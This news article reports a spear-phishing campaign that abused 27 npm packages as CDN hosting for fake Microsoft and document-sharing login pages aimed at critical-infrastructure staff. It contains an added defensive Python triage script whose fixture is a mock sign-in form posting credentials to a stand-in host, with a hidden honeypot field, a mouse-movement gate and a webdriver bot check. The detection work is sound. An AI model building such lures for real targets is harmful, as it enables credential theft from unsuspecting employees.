Cybersecurity researchers recently identified a targeted five-month spear-phishing campaign that utilized 27 malicious npm packages to steal credentials from critical infrastructure organizations. By repurposing legitimate package distribution networks as hosting infrastructure, the attackers delivered deceptive login lures that specifically targeted commercial personnel in sectors like manufacturing and healthcare.
Security experts at Socket discovered a sophisticated operation where threat actors uploaded nearly thirty packages across various aliases to the npm registry. Unlike traditional supply chain attacks that rely on users installing malicious code, this campaign used the npm infrastructure as a resilient hosting service for phishing content. The attackers leveraged package content delivery networks to serve deceptive HTML and JavaScript files, making the malicious infrastructure difficult for defenders to dismantle or block through standard security protocols.
The campaign focused heavily on sales and commercial employees within organizations related to critical infrastructure across the United States and its allies. Over two dozen companies in industries such as industrial automation, plastics, manufacturing, and healthcare were specifically selected for these attacks. By masquerading as document-sharing portals or Microsoft sign-in pages, the lures aimed to trick high-value targets into surrendering their corporate credentials to the attackers.
Technical analysis reveals that the phishing pages were designed with advanced evasion techniques to bypass automated security scanners and manual inspection. The malicious JavaScript code was frequently obfuscated or heavily minified to frustrate researchers. Furthermore, the lures required human interaction, such as mouse movements or touch input, and performed client-side checks to identify and block bots or sandboxed environments used by security researchers.
Another layer of defense for the attackers included the implementation of honeypot form fields within the phishing pages. These invisible fields were designed to be filled out by automated crawlers but left blank by human users, allowing the attack to terminate if it detected non-human activity. This strategic use of “anti-analysis” controls ensured that the credential-harvesting infrastructure remained hidden from security tools for as long as possible.
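As an added illustration (not code from Socket's report or from this article), the following Python script shows two defender-side checks that follow from the hosting and anti-analysis techniques described above: a proxy-log triage that flags HTML documents served from package CDNs (which browsers normally fetch only for scripts, stylesheets and JSON), and a content triage that scores an HTML page for credential-harvesting markers, including the hidden honeypot form field, the interaction gate and the automation check. The CDN host names, the log format, the version string and the sample HTML are constructed assumptions; only the package name `secure-docs-app` comes from the article.

```python
"""Triage helpers for phishing pages hosted on npm package CDNs (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts that serve raw files straight out of npm packages. The
# article does not name the CDNs involved; these are illustrative entries.
PACKAGE_CDN_HOSTS = {"unpkg.com", "cdn.jsdelivr.net"}

# Constructed proxy log (not from the article). One request per line:
# timestamp client_ip method url status content_type bytes
SAMPLE_PROXY_LOG = """\
2024-03-01T09:12:01Z 10.0.0.21 GET https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js 200 application/javascript 72430
2024-03-01T09:12:05Z 10.0.0.21 GET https://unpkg.com/secure-docs-app@1.0.2/index.html 200 text/html 4812
2024-03-01T09:12:06Z 10.0.0.21 GET https://unpkg.com/secure-docs-app@1.0.2/app.min.js 200 application/javascript 18220
2024-03-01T09:13:40Z 10.0.0.33 GET https://example.org/docs/index.html 200 text/html 9901
"""

# Constructed fixture: a generic sign-in form with the three markers the
# article describes (off-screen honeypot field, interaction gate, bot check).
SAMPLE_HTML = """<!doctype html><html><head><title>Sign in</title></head><body>
<form method="post" action="https://collector.invalid/submit">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="text" name="website" tabindex="-1" autocomplete="off" style="position:absolute;left:-9999px">
  <button type="submit">Next</button>
</form>
<script>
  var armed = false;
  document.addEventListener("mousemove", function () { armed = true; });
  if (navigator.webdriver) { armed = false; }
</script>
</body></html>"""

# CSS fragments that hide a field from a human while a crawler still "sees" it.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}px|opacity\s*:\s*0(?![.\d])",
    re.I,
)


def triage_proxy_log(log_text):
    """Return URLs where a package CDN served a text/html document."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue  # malformed line: skip rather than crash the sweep
        url, content_type = parts[3], parts[5]
        host = urlparse(url).hostname or ""
        if host in PACKAGE_CDN_HOSTS and content_type.startswith("text/html"):
            hits.append(url)
    return hits


class _FormScanner(HTMLParser):
    """Collect <input> attributes, <form> actions and inline script text."""

    def __init__(self):
        super().__init__()
        self.inputs, self.form_actions, self.script_text = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None for bare attributes
        if tag == "input":
            self.inputs.append(a)
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def score_login_page(html, page_host):
    """Return the list of credential-harvesting indicators found in a page."""
    scanner = _FormScanner()
    scanner.feed(html)
    findings = []
    if any((i.get("type") or "").lower() == "password" for i in scanner.inputs):
        findings.append("password_field")
    # Honeypot: a fillable field hidden by CSS, so only automated crawlers populate it.
    for i in scanner.inputs:
        itype = (i.get("type") or "text").lower()
        if itype not in ("hidden", "submit", "button") and HIDDEN_STYLE.search(i.get("style") or ""):
            findings.append("honeypot_field:" + (i.get("name") or "?"))
    # Credentials posted to a host other than the one serving the page.
    for action in scanner.form_actions:
        host = urlparse(action).hostname
        if host and host != page_host:
            findings.append("cross_origin_post:" + host)
    script = "\n".join(scanner.script_text)
    if re.search(r"mousemove|touchstart|pointermove", script):
        findings.append("interaction_gate")  # page arms itself only after human input
    if re.search(r"webdriver|phantom|headless", script, re.I):
        findings.append("automation_check")  # page probes for browser automation
    return findings


if __name__ == "__main__":
    for url in triage_proxy_log(SAMPLE_PROXY_LOG):
        print("HTML from package CDN:", url)
    print("Indicators:", score_login_page(SAMPLE_HTML, "unpkg.com"))
```

The first check is the cheap one to run continuously over proxy or DNS telemetry; the second is what an analyst runs on a fetched page to decide whether a CDN URL flagged by the first deserves a block and a takedown request.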
The list of identified packages highlights the breadth of the campaign, featuring names like onedrive-verification, secure-docs-app, and sync365 alongside more randomized strings. Despite some of these libraries being flagged or removed, the attackers’ ability to quickly pivot to new aliases and package names demonstrated the durability of their method. This incident underscores a growing trend where legitimate developer tools are weaponized not just for code execution, but as stable platforms for global social engineering operations.
Source: 27 Malicious Npm Packages Used As Phishing Tools To Steal User Login Credentials